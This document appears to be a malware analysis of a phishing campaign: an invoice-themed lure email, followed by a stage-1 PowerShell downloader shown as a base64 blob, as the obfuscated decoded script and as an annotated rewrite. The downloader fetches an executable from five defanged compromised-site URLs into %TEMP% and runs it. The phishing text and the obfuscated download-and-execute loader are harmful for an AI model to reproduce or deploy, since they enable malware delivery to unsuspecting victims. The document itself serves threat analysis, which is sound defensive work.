- # Phishing Email
- Hi [recipient],
- I’ve tried to call you but couldn’t get thought. Need to know the status of this invoice I’ve sent to you a while ago. provided a copy below.
- http://advancedalternatives[dot]co.th/Invoice-number-154082/
- Best Regards,
- [fake sender name]
- # Linked Payload
- Stage 1 payload is a .doc file which executes the PowerShell below (shown as delivered in base64, then decoded, then deobfuscated).
- SHA256: f13e2c5ae7e3f949a575856fb0b5d285eae746c7b77cf6272a6e11e99fcec9e6
- Stage 2 payload is downloaded from one of the URLs listed in the deobfuscated section below; the script tries each URL in turn and stops after the first one it can download from. It has not been analyzed yet.
- # Original Stage 1 Payload
- JAB7AFcAYABzAEMAcgBgAEkAUAB0AH0AIAA9ACAALgAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAnAG4AZQB3AC0AbwAnACwAJwB0ACcALAAnAGIAagBlAGMAJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbABsACcALAAnAGUAJwAsACcAVwBTAGMAcgBpAHAAdAAuAFMAJwAsACcAaAAnACkAOwAkAHsAVwBFAGAAQgBgAGMAYABMAEkARQBOAFQAfQAgAD0AIAAuACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBlACcALAAnAGMAdAAnACwAJwBuAGUAdwAtAG8AYgBqACcAKQAgACgAIgB7ADIAfQB7ADUAfQB7ADEAfQB7ADQAfQB7ADAAfQB7ADMAfQB7ADYAfQAiAC0AZgAnAFcAZQBiAEMAbABpACcALAAnAC4AJwAsACcAUwB5AHMAdAAnACwAJwBlACcALAAnAE4AZQB0AC4AJwAsACcAZQBtACcALAAnAG4AdAAnACkAOwAkAHsAUgBBAG4AYABEAGAATwBNAH0AIAA9ACAAJgAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAIAAnAHcALQBvACcALAAnAG4AZQAnACwAJwBiAGoAZQBjAHQAJwApACAAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBtACcALAAnAHIAYQBuAGQAbwAnACkAOwAkAHsAVQByAGAAbABzAH0AIAA9ACAAKAAiAHsAMQA0AH0AewAyADAAfQB7ADEAOQB9AHsAMQAzAH0AewAwAH0AewAxADcAfQB7ADMAfQB7ADIAMwB9AHsANAB9AHsANwB9AHsAMQA4AH0AewA1AH0AewAxADUAfQB7ADIAOQB9AHsAOQB9AHsANgB9AHsAMwAwAH0AewAyAH0AewAyADEAfQB7ADEAMQB9AHsAMQB9AHsAMgA4AH0AewAyADYAfQB7ADEAMgB9AHsAOAB9AHsAMgA3AH0AewAyADQAfQB7ADEANgB9AHsAMgAyAH0AewAxADAAfQB7ADIANQB9ACIAIAAtAGYAJwBxAG4AaAAnACwAJwBJAG4AVgBUAC8ALAAnACwAJwAvAHoAcgAnACwAJwB0ACcALAAnAC8ALwB3ACcALAAnAGkAZwBuAC4AYwBvAG0ALgBhAHUALwAnACwAJwB0AGkAdgBlAGkAdAAnACwAJwBpACcALAAnAHIAdABzACcALAAnAGUAYwAnACwAJwB3AEoAJwAsACcARwAnACwAJwBvACcALAAnAC8AbwBoAGwAZQByAG8AbgBsAGkAbgBlAC4AYwBvAG0ALwAnACwAJwBoACcALAAnAEUAbQBPAFkAegBjAGkAJwAsACcAeQBvAGYAJwAsACcAdgBxAEwAZQBHAGQAcwAvACwAaAAnACwAJwBsAHMAbwBuAGQAZQBzACcALAAnAHAAOgAvACcALAAnAHQAdAAnACwAJwBNACcALAAnAGQAYQBsAGwAYQBzAC4AYwBvAG0ALwBGACcALAAnAHQAcAA6ACcALAAnAG8AbQAuAGIAcgAvAEEARQBWAEgAVgAvACwAaAB0AHQAcAA6AC8ALwBuAHUAYgBvAGQAJwAsACcAUwBnAHYAUABLAEYALwAnACwAJwA6AC8ALwBwACcALAAnAGUAdgBlAG4ALgBjACcALAAnAGgAdAB0AHAAJwAsACcAWABOAC8ALABoAHQAdABwADoALwAvAGUAZgBmACcALAAnAC4AYwBvAG0ALgBhAHUAJwApAC4AKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAdAAnACwAJwBTAHAAbABpACcAKQAuAEkAbgB2AG8AawBlACgAJwAsACcAKQA7ACQAewBOAGAAQQBNAGUAfQAgAD
0AIAAkAHsAUgBgAEEAYABOAGQATwBNAH0ALgAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAG4AJwAsACcAZQB4AHQAJwApAC4ASQBuAHYAbwBrAGUAKAAxACwAIAA2ADUANQAzADYAKQA7ACQAewBQAGEAYABUAGgAfQAgAD0AIAAkAHsAZQBgAE4AVgA6AGAAVABlAG0AUAB9ACAAKwAgACcAXAAnACAAKwAgACQAewBOAEEAYABtAGUAfQAgACsAIAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAC4AJwAsACcAZQB4AGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAewBVAGAAUgBsAH0AIABpAG4AIAAkAHsAVQByAGAATABzAH0AKQB7AHQAcgB5AHsAJAB7AHcAZQBgAEIAQwBMAGAAaQBgAGUAbgB0AH0ALgAoACIAewAwAH0AewAxAH0AewAzAH0AewAyAH0AIgAtAGYAJwBEACcALAAnAG8AdwBuAGwAJwAsACcAYQBkAEYAaQBsAGUAJwAsACcAbwAnACkALgBJAG4AdgBvAGsAZQAoACQAewBVAGAAUgBMAH0ALgAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAbgBnACcALAAnAFQAbwBTAHQAcgBpACcAKQAuAEkAbgB2AG8AawBlACgAKQAsACAAJAB7AFAAYQBgAFQASAB9ACkAOwAmACgAIgB7ADMAfQB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACcAdAAtAFAAcgAnACwAJwBvAGMAJwAsACcAZQBzAHMAJwAsACcAUwB0AGEAcgAnACkAIAAkAHsAcABgAEEAdABIAH0AOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7ACYAKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIALQBmACcAdwAnACwAJwBoAG8AcwB0ACcALAAnAHIAaQB0ACcALAAnAGUALQAnACkAIAAkAHsAXwB9AC4AIgBFAGAAWABjAGUAcABUAGAAaQBvAG4AIgAuACIATQBFAHMAUwBgAEEAYABHAEUAIgA7AH0AfQANAAoA
- # Decoded
- # Stage 1 as decoded from the base64 above (UTF-16LE text). Identifiers are broken up with
- # backticks and every cmdlet / member name is rebuilt at runtime from a "{n}{m}" -f format
- # string, so no literal "New-Object", "DownloadFile" or "Start-Process" appears in the script.
- # The resolved name is noted per line; the "# Deobfuscated" section below is the analyst's rewrite.
- ${W`sCr`IPt} = .("{0}{2}{1}" -f'new-o','t','bjec') -ComObject ("{2}{3}{1}{0}"-f 'll','e','WScript.S','h');   # New-Object -ComObject WScript.Shell; not referenced again below
- ${WE`B`c`LIENT} = .("{2}{0}{1}" -f 'e','ct','new-obj') ("{2}{5}{1}{4}{0}{3}{6}"-f'WebCli','.','Syst','e','Net.','em','nt');   # New-Object System.Net.WebClient
- ${RAn`D`OM} = &("{1}{0}{2}"-f 'w-o','ne','bject') ("{1}{0}" -f'm','rando');   # New-Object random
- ${Ur`ls} = ("{14}{20}{19}{13}{0}{17}{3}{23}{4}{7}{18}{5}{15}{29}{9}{6}{30}{2}{21}{11}{1}{28}{26}{12}{8}{27}{24}{16}{22}{10}{25}" -f'qnh','InVT/,','/zr','t','//w','ign.com.au/','tiveit','i','rts','ec','wJ','G','o','/ohleronline.com/','h','EmOYzci','yof','vqLeGds/,h','lsondes','p:/','tt','M','dallas.com/F','tp:','om.br/AEVHV/,http://nubod','SgvPKF/','://p','even.c','http','XN/,http://eff','.com.au').("{1}{0}"-f't','Spli').Invoke(',');   # one comma-separated string holding the five stage-2 URLs, .Split(',') into an array (listed defanged in the Deobfuscated section)
- ${N`AMe} = ${R`A`NdOM}.("{0}{1}"-f 'n','ext').Invoke(1, 65536);   # Random.Next(1, 65536): an integer in 1..65535
- ${Pa`Th} = ${e`NV:`TemP} + '\' + ${NA`me} + ("{0}{1}" -f'.','exe');   # $env:TEMP + '\' + <number> + '.exe' -- the dropped-file path
- foreach(${U`Rl} in ${Ur`Ls}){try{${we`BCL`i`ent}.("{0}{1}{3}{2}"-f'D','ownl','adFile','o').Invoke(${U`RL}.("{1}{0}" -f 'ng','ToStri').Invoke(), ${Pa`TH});   # WebClient.DownloadFile($url.ToString(), $path)
- &("{3}{0}{1}{2}" -f't-Pr','oc','ess','Star') ${p`AtH};   # Start-Process <path>: launches the downloaded file
- break;   # stop after the first URL that downloads successfully
- }catch{&("{0}{2}{3}{1}"-f'w','host','rit','e-') ${_}."E`XcepT`ion"."MEsS`A`GE";   # write-host $_.Exception.Message: a failed URL is only logged and the next one is tried
- }}
- # Deobfuscated
- # Analyst's readable rewrite of the decoded script above. It is a reading aid, not a byte-exact
- # transcription; the per-line notes mark where it differs from the decoded form.
- $WScript = New-Object -ComObject WScript.Shell;   # created but never used by the rest of the script
- $WebClient = New-Object System.Net.WebClient;
- $Random = New-Object random;
- $Urls = {"http://ohleronline[dot]com/qnhvqLeGds/",   # NOTE(review): the decoded script builds one comma-separated string and .Split(',')s it into an array; braces as written here would be a script block
- "http://wilsondesign[dot]com.au/EmOYzciXN/",
- "http://effectiveit[dot]com.au/zrMGInVT/",
- "http://portseven[dot]com.br/AEVHV/",
- "http://nubodyofdallas[dot]com/FwJSgvPKF/"   # URLs defanged with [dot]; this is the order in which they are tried
- };
- $Name = $Random.Next.Invoke(1, 65536);   # random integer in 1..65535
- $Path = $EnvTemp + '\' + $Name + '.exe';   # decoded form uses ${e`NV:`TemP}, i.e. $env:TEMP -- the dropped file is %TEMP%\<number>.exe
- foreach($Url in $Urls) {   # the first URL that downloads successfully wins
- try {
- $WebClient.DownloadFile.Invoke($Url.ToString.Invoke(), $Path);
- Start-Process $Path;   # runs the downloaded stage 2
- Break;
- } catch {
- Write-Host $Exception.Message;   # decoded form is ${_}."Exception"."Message": the failed URL's error is printed and the loop continues
- }
- }